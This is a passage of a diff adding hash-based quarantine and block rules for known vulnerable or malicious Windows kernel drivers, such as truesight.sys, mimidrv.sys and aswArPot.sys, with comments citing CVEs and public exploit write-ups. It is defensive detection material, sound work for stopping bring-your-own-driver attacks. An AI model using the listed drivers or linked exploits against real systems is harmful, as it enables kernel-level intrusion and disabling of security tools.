"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975446Z", + "creation_date": "2026-03-23T11:45:29.975447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "207b6cea0c9f7e94a912b388d5e9f7ace3b6405114f64bcc425042a09170fcac", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) 
[CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a22dd93f-87be-557e-a549-4feefefd7c0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144393Z", + "creation_date": "2026-03-23T11:45:31.144395Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c49fe7af43a777e3d1b7e883e7e65e860deb8e35f189b8352828e7ab455d4fee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a237013c-9ab2-5934-b802-095b7fa58a61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811044Z", + "creation_date": "2026-03-23T11:45:31.811046Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e6c794dc342d12e520a6929450033914f16a982f0b1b786fac55ca1fb4232bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a25244de-f2ae-50e3-ae3d-ba508e93ad34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144253Z", + "creation_date": "2026-03-23T11:45:31.144255Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94a7a48ea51c0dbae5318bb697cda5ad00f20dbb7dfa6c0ea940e44d728c031c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2560996-b8a4-55b5-8f05-cb363a67e8fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810155Z", + "creation_date": "2026-03-23T11:45:31.810158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d1d75a1d68c7754a5c16cae617bd8e0a37823bb0c9e83e2f7a122a5392eedb46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a25c5fdc-4449-5c42-8870-90d96cc4fae4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492161Z", + "creation_date": 
"2026-03-23T11:45:31.492163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4589bf3f26fbbcfede64f606b98d9159ce7dd462928ac1775c668a7a658cf14f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a26e5896-d10f-502b-9ecc-5febacf092db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824312Z", + "creation_date": "2026-03-23T11:45:30.824315Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ac56a208b2f9eaa828d2351c5baf3b4cdb64092a026d7a5db4c78d40bb6ec04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "a2725a61-1891-595d-98e9-d0682faaa634", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828239Z", + "creation_date": "2026-03-23T11:45:30.828241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a7f1e339882a1c486f42016dcf9de3c29dbd630e81e77194ddb3eebab2e94fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2751907-6cfd-57d8-98ed-3976250da994", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617748Z", + "creation_date": "2026-03-23T11:45:29.617750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d041654d8cbf189c29919733fd40184ceaf0050295fc7a7e6e3f4cda45b5e090", + "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2899ca0-faaa-5f29-bd19-56420a9f2627", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141999Z", + "creation_date": "2026-03-23T11:45:31.142001Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20d5f791ebf599b5ff1fcfcd1858c775b76bea553bd3cabee6798564d23ffc3f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a28ae5f9-3ff0-5ebc-b85c-39fd751a6247", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470102Z", + "creation_date": "2026-03-23T11:45:30.470105Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "938e65ff5760e44faf22a35242547c41a0d8d2b21a2f8a12f6b84d4055aad384", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2a3c80a-510e-5aa4-a50d-a447ab23c102", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815765Z", + "creation_date": "2026-03-23T11:45:30.815768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815773Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b1920889466cd5054e3ab6433a618e76c6671c3e806af8b3084c77c0e7648cbe", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2aaf45a-d91a-5b24-9ed1-78ba6346ad7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491443Z", + "creation_date": "2026-03-23T11:45:31.491447Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491455Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b63b01658504ef8de8de80ec30f9633837f646cadfbdce0612b6debbf4e8a54c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2c5307f-1bc4-52d2-b9ae-e369849db198", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816981Z", + "creation_date": "2026-03-23T11:45:30.816983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816989Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "145b3490f5d3f45dc014d8c14112e9973796024ef1e896a10998f08bba45d8e5", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2c86623-915d-5927-817a-e7a72481abe5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462736Z", + "creation_date": "2026-03-23T11:45:30.462739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462748Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26ef7b27d1afb685e0c136205a92d29b1091e3dcf6b7b39a4ec03fbbdb57cb55", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2d3c370-1fd5-54fa-b5c0-324d7d30bda9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143373Z", + "creation_date": "2026-03-23T11:45:32.143375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccc65f108ad084af41725e42efc3c3c539f89a474c1b1293b111a83e3eba216a", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2dbeb41-b5cc-53ad-b21b-96fc832b6681", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817679Z", + "creation_date": "2026-03-23T11:45:30.817681Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.817686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be589c5c853c86703e23e3b77455bd0d4330bd5e612d0af538f98cc3c4cec1b4", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a2fa4a70-de4e-5f44-9746-73ea5b695760", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464341Z", + "creation_date": "2026-03-23T11:45:30.464344Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8743094f002239a8a9d6d7852c7852e0bb63cd411b007bd8c194bcba159ef15", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a304ebc5-14cc-5e8d-b11b-98728178226e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968723Z", + "creation_date": "2026-03-23T11:45:29.968725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968730Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf086b30d80ae4a4e1d6cafecf511622f077493d52c4d729ede5d4ca6b4be02e", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a31223eb-322e-5a2d-91ae-723f63d5942e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490454Z", + "creation_date": "2026-03-23T11:45:31.490456Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490461Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b88c0b535bc65985dd945baaa524a400fc5a9366eafca8ac81adc5a070db975e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a31ef481-0fda-561d-8839-3d6143dd4216", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821708Z", + "creation_date": "2026-03-23T11:45:31.821710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dad6d1ef2fc1586320e76171fd16822be56b4eee1497e7c97e72ac4421065b27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a32387ad-cc7e-5973-a3ce-0241204f2fe3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812222Z", + "creation_date": "2026-03-23T11:45:31.812224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "593ecfd5831961c85af43db78d2b89de0e8766627838b958528a3d745f4d47b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a329ac31-42ac-58c1-bf6a-9c8e1dffc5d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614736Z", + "creation_date": "2026-03-23T11:45:29.614738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, 
NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a32b6724-55fd-5bd1-bea6-041d24a8916d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824563Z", + "creation_date": "2026-03-23T11:45:31.824565Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824570Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c1adf6d58c674a77eb875ccb7dc3290148a94609df0dedcb961c1f78ac5bbd0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a32b7f9a-fe93-550d-b41d-ed1b9be70f4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832187Z", + "creation_date": 
